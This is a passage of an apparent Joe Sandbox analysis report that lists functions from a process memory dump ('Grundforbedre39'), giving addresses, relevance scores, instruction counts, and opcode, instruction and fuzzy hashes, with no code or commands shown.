                                                                                      • API String ID: 0-232158463
                                                                                      • Opcode ID: bb1800fa865f6867d64b64073cb907d57a26f5b50620fda259c2cccbb9ecf613
                                                                                      • Instruction ID: 9d78141364c8915adeb0caed16f1bbeb7ca026b4946d6c6d53ac5d7b786e5bc4
                                                                                      • Opcode Fuzzy Hash: bb1800fa865f6867d64b64073cb907d57a26f5b50620fda259c2cccbb9ecf613
                                                                                      • Instruction Fuzzy Hash: 54712872A01249DFDB05CFA8C980FAEB7F8BF48744F554466E905E7291EB34E941CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3559F42F Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      • Opcode ID: eee76bbae02219fb797dab45fbf0174c31c6c0e13cd8337fe5c1cc68730345c0
                                                                                      • Instruction ID: 6aa62cf0a7afc1aa0c2ee26a7300c2631650ca9f6aae1ecc061e520ded1de36b
                                                                                      • Opcode Fuzzy Hash: eee76bbae02219fb797dab45fbf0174c31c6c0e13cd8337fe5c1cc68730345c0
                                                                                      • Instruction Fuzzy Hash: 06519DB2608345AFE726CE14C880FABB7E8FF84754F800929B545D7290DBB8F904CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355D86A8 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0h`5
                                                                                      • API String ID: 0-2766475937
                                                                                      • Opcode ID: b5a6f74102e519c7123c790160be9c1df023c4d000ed99662d8aff405a38c3a6
                                                                                      • Instruction ID: a7e5d0675b7dcef6665e29b124bcd8132e29ecfc86fceac07482b164abcb9e31
                                                                                      • Opcode Fuzzy Hash: b5a6f74102e519c7123c790160be9c1df023c4d000ed99662d8aff405a38c3a6
                                                                                      • Instruction Fuzzy Hash: 4041B276704611ABD615CA2DC890F6BF7EAFFC07A0F408619E816D72A0DB75F801C791
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3552E547 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: EXT-
                                                                                      • API String ID: 0-1948896318
                                                                                      • Opcode ID: c9babdc28731e7e1668ccae377a05182141038355107de126fa0fa8e6dad5987
                                                                                      • Instruction ID: 0a369bbdc93dbfcdcd80db96c14b40d0bf0c4a1bb126de5e6f4d3dd3cb457a0b
                                                                                      • Opcode Fuzzy Hash: c9babdc28731e7e1668ccae377a05182141038355107de126fa0fa8e6dad5987
                                                                                      • Instruction Fuzzy Hash: 68419E726583519FD710CA60D844B6BB7E8AFC8714F814A2DF589E7280EA74FA088796
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355441BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      • Opcode ID: d2fddf2d104dfd6919a32290ad8f3c65c5b5de22df9be92ddbe7328f1d5c717a
                                                                                      • Instruction ID: 48e235f37a73e59ea130abab7d68a92a920b08b58e2165f8b48dee85fec28d12
                                                                                      • Opcode Fuzzy Hash: d2fddf2d104dfd6919a32290ad8f3c65c5b5de22df9be92ddbe7328f1d5c717a
                                                                                      • Instruction Fuzzy Hash: 90516A71604710AFD321CF59C841A6BBBF8FF88710F40892EF996976A0E7B4E904CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3558C3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: BinaryHash
                                                                                      • API String ID: 0-2202222882
                                                                                      • Opcode ID: 1611d826f8b469ee62590e94d5f136d31c83f2a18391c9badbcb16bdcf59d043
                                                                                      • Instruction ID: 5787c1c344ae4dc8c390f52a8d413112c7ef5b19ca79682c588e799ff6e3b14b
                                                                                      • Opcode Fuzzy Hash: 1611d826f8b469ee62590e94d5f136d31c83f2a18391c9badbcb16bdcf59d043
                                                                                      • Instruction Fuzzy Hash: 584157F1A0012CABDB21DA50DC80FDE777CAF84714F5045E6E609AB251DB70AE888FA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355107A7 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: P5
                                                                                      • API String ID: 0-2020957795
                                                                                      • Opcode ID: 1c08badd843172bcf7df830d97d1659fac7b50ef5875d67ec401f2bc1465df55
                                                                                      • Instruction ID: d80cf62ea874b486d41d49ecaab93890acc99a1834d41144296da51847a80814
                                                                                      • Opcode Fuzzy Hash: 1c08badd843172bcf7df830d97d1659fac7b50ef5875d67ec401f2bc1465df55
                                                                                      • Instruction Fuzzy Hash: C9419276608745AFE714CF2AC480A12BBF5FF48314B50496ED85687A60EB70F656CBD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35599429 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: verifier.dll
                                                                                      • API String ID: 0-3265496382
                                                                                      • Opcode ID: 151976846d4c724eca6ebe321d98dddb08786f68724d20c17677301179bd7d62
                                                                                      • Instruction ID: 7ab1f74652dbeee52bacfc2e1d4df945c83ab611338b3ae1ca7354b32a03ba4a
                                                                                      • Opcode Fuzzy Hash: 151976846d4c724eca6ebe321d98dddb08786f68724d20c17677301179bd7d62
                                                                                      • Instruction Fuzzy Hash: D231B3F5714201AFEB288F58D860B6673F5FF98350F90446AE509DF281EB35AD81C750
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35547425 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #
                                                                                      • API String ID: 0-1885708031
                                                                                      • Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                                      • Instruction ID: bc48510ccb1859fbbe568cc2b9705e92c09348b17bc87120ddc15d0cb1d109ca
                                                                                      • Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                                      • Instruction Fuzzy Hash: 94418BB5A00619DBDF11CF88C880FBEBBB5FB80745F40445AE945AB250DB74A942C7D1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3554360F Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Flst
                                                                                      • API String ID: 0-2374792617
                                                                                      • Opcode ID: 85945102816fdeeea3f608d179b65b734a4d7904fa149cc348b797e81c7a63a1
                                                                                      • Instruction ID: f07762ef1304a6caf2875b3e9a530ecfa34739f846500ab239ff8f910f7e56e2
                                                                                      • Opcode Fuzzy Hash: 85945102816fdeeea3f608d179b65b734a4d7904fa149cc348b797e81c7a63a1
                                                                                      • Instruction Fuzzy Hash: EB41B8B1609302DFD304CF18C180A16BBE5FB99714F9185AEE46A8B291DB71E982CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3558C6F2 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: BinaryName
                                                                                      • API String ID: 0-215506332
                                                                                      • Opcode ID: d5c439b313a2113eab601d45fbd4097d2131b47b0257452b82a16d106eea253f
                                                                                      • Instruction ID: 8e832564e8c1a08fa22023cf2e5c99fcd58b3aa3d1ccdcbf1517e834f77331e9
                                                                                      • Opcode Fuzzy Hash: d5c439b313a2113eab601d45fbd4097d2131b47b0257452b82a16d106eea253f
                                                                                      • Instruction Fuzzy Hash: D031C37AB00A19EFEB16CA58C845E6FB7B5EB80720F51452DE901EB290D730AE04C7E0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3559C490 Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: S5
                                                                                      • API String ID: 0-2861399667
                                                                                      • Opcode ID: a2162bbd9cf02cf046cab1e97e924e2b9970a3af389f9b50174328ce9e3db488
                                                                                      • Instruction ID: 73b2972ab686e68a7cd6c4113857e7ad8b77ac9645dfdae5e08f1f3394c0e6d4
                                                                                      • Opcode Fuzzy Hash: a2162bbd9cf02cf046cab1e97e924e2b9970a3af389f9b50174328ce9e3db488
                                                                                      • Instruction Fuzzy Hash: 6611FAB1A00259EFCB04DFA9D541AAEBBF8FF58310F50446AF905E7341D674EA01CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35508347 Relevance: .4, Instructions: 380COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 121736dbf73b7a0397d0503ad3e453f9b49b61b7aae6d104795159da71a0ce17
                                                                                      • Instruction ID: e8254ff31231d8ac33760e4a012e8c910576c8cc476f73bd04d98ed64f8d25db
                                                                                      • Opcode Fuzzy Hash: 121736dbf73b7a0397d0503ad3e453f9b49b61b7aae6d104795159da71a0ce17
                                                                                      • Instruction Fuzzy Hash: D8D1D071B007069BEB04CF65C890EBA77B6BF94358F894629E915DB280EB34F945CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3551D700 Relevance: .3, Instructions: 342COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3ea6ed23ab7f656620d5fa65d3be6c91c35d2fe7eef5c1daddd21c9a9692ce9c
                                                                                      • Instruction ID: d9a6f85724aa4725f0399647d0ee83142c4c2357004eacb381ffeeeb7fb1c74c
                                                                                      • Opcode Fuzzy Hash: 3ea6ed23ab7f656620d5fa65d3be6c91c35d2fe7eef5c1daddd21c9a9692ce9c
                                                                                      • Instruction Fuzzy Hash: 22C1D775A042169FEF18CF58C840B9DBBB2BF94360F568659DC25AB280D774FA41CBD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35551763 Relevance: .3, Instructions: 322COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4d6d24d247cf28fee44edbf0c0cb75d5b758c927951aaf643e8dc26e1cf9d731
                                                                                      • Instruction ID: d20a6ee9f0c098ea95c69d2895c3168583bbe2f0b40d21c95ff36365aad2f752
                                                                                      • Opcode Fuzzy Hash: 4d6d24d247cf28fee44edbf0c0cb75d5b758c927951aaf643e8dc26e1cf9d731
                                                                                      • Instruction Fuzzy Hash: 95D1F5B5A002049FDB51CF68C980B967BF9BF48350F4444BAED4ADF256E771E905CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3552F380 Relevance: .3, Instructions: 321COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 22cab0bfd7841efee08d8e5685a9cd61398a7070eaaf8b8c8479e35ba5aa3e32
                                                                                      • Instruction ID: 6109e90609f45598ab068801647835c05fd51154a27df6df8fb211979668bc42
                                                                                      • Opcode Fuzzy Hash: 22cab0bfd7841efee08d8e5685a9cd61398a7070eaaf8b8c8479e35ba5aa3e32
                                                                                      • Instruction Fuzzy Hash: BBC110B5B042658FEB04CF18E4D1B69B3B2FF88B44F554099E842EF2D1DB70A941CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355137E4 Relevance: .3, Instructions: 303COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dbb8ace1e68ee602f112b9f2a96c345067c6f3750232134eaaa9a2ee073cac75
                                                                                      • Instruction ID: b93e76146e63b49cd89d52fd6209aab99d98fb8ccc1bbdd9ccb9cce33ffff1e4
                                                                                      • Opcode Fuzzy Hash: dbb8ace1e68ee602f112b9f2a96c345067c6f3750232134eaaa9a2ee073cac75
                                                                                      • Instruction Fuzzy Hash: 32C168B1A042499FEB15CF98D950A9DBBF5FF88354F51446AE80AEB350EB34AA01CF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35520445 Relevance: .3, Instructions: 300COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ca320c6715a3b1e2cbc0dc72606988dab3986815595a3c1468d23baff130f5d2
                                                                                      • Instruction ID: e3fc0054477d53d1c11bed1ab42ede9792d2bc142f5adb59ef9e7d20dfe9bb92
                                                                                      • Opcode Fuzzy Hash: ca320c6715a3b1e2cbc0dc72606988dab3986815595a3c1468d23baff130f5d2
                                                                                      • Instruction Fuzzy Hash: 26B10072704745EFEB15CBA4C890BAEBBB6BF84310F544569D592DB290DB30FA41CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3550C3C7 Relevance: .3, Instructions: 280COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e7744e7a56a2e8e88ae11951a99a463f063acb7587a5bc47a40b3da6698c4f1d
                                                                                      • Instruction ID: 27f16e9de9843f943b91c56a1d23533317a826afeb7d44e041f79a7de0ceb959
                                                                                      • Opcode Fuzzy Hash: e7744e7a56a2e8e88ae11951a99a463f063acb7587a5bc47a40b3da6698c4f1d
                                                                                      • Instruction Fuzzy Hash: 4CB16E74B002658BDB64CF64C890BA9F3B5FF85744F4185EAD40AAB290EB70ED85CF60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355500A5 Relevance: .3, Instructions: 276COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5b21625c3e6a66497a74081b6eb84491e31f68335928b02f7198d0605a04a96d
                                                                                      • Instruction ID: 9a6b63fa64c3db7ff363b6bdc7fdf33e13bc8f46fa855cd1fbddfb4a64e8162f
                                                                                      • Opcode Fuzzy Hash: 5b21625c3e6a66497a74081b6eb84491e31f68335928b02f7198d0605a04a96d
                                                                                      • Instruction Fuzzy Hash: ABA1C475B01706DFE714CFA5C991BAAB7B1FF44364F90482AEA46972A0DB74F805CB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355E4080 Relevance: .3, Instructions: 275COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6baafd8d3242770bc57c4abb1cb6c9a0b7243c22d76638935783f4538bb4ac78
                                                                                      • Instruction ID: f560310dbf288488c4b077c514067612bca3565e965ec86d27d38bdec48cc5d4
                                                                                      • Opcode Fuzzy Hash: 6baafd8d3242770bc57c4abb1cb6c9a0b7243c22d76638935783f4538bb4ac78
                                                                                      • Instruction Fuzzy Hash: 55A1BAB2A18601EFD711CF24C980B9AB7E9FF88705F810929E5869B690D774FC41CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3552E310 Relevance: .3, Instructions: 261COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e4cc435f12124bfba8ff13bf823cbdc3238e02e9963cd824dd56749cd13f62a2
                                                                                      • Instruction ID: 97d9091d821ebdb719c27a7ae0663e147e6d19ca54647f55d11619e775a982cf
                                                                                      • Opcode Fuzzy Hash: e4cc435f12124bfba8ff13bf823cbdc3238e02e9963cd824dd56749cd13f62a2
                                                                                      • Instruction Fuzzy Hash: 5991217AA046158FE700CB68C480BBE77B2FF98750F5541A9E8059B2C0EB34B942CBE1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355193A6 Relevance: .3, Instructions: 259COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 006ffc1cb6decd9f456ac37fdd0e27abf31f97dfcfcc4545450a6b7f83ce0178
                                                                                      • Instruction ID: de51909a98f067dee4caf0140c8f1f25aeafef896889d4c584ae43da718c7ac6
                                                                                      • Opcode Fuzzy Hash: 006ffc1cb6decd9f456ac37fdd0e27abf31f97dfcfcc4545450a6b7f83ce0178
                                                                                      • Instruction Fuzzy Hash: 77B15078A043059FEF24CF18D540B99BBB1BF88394F50455DDC22AB391DBB4EA82CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355CB0AF Relevance: .2, Instructions: 222COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
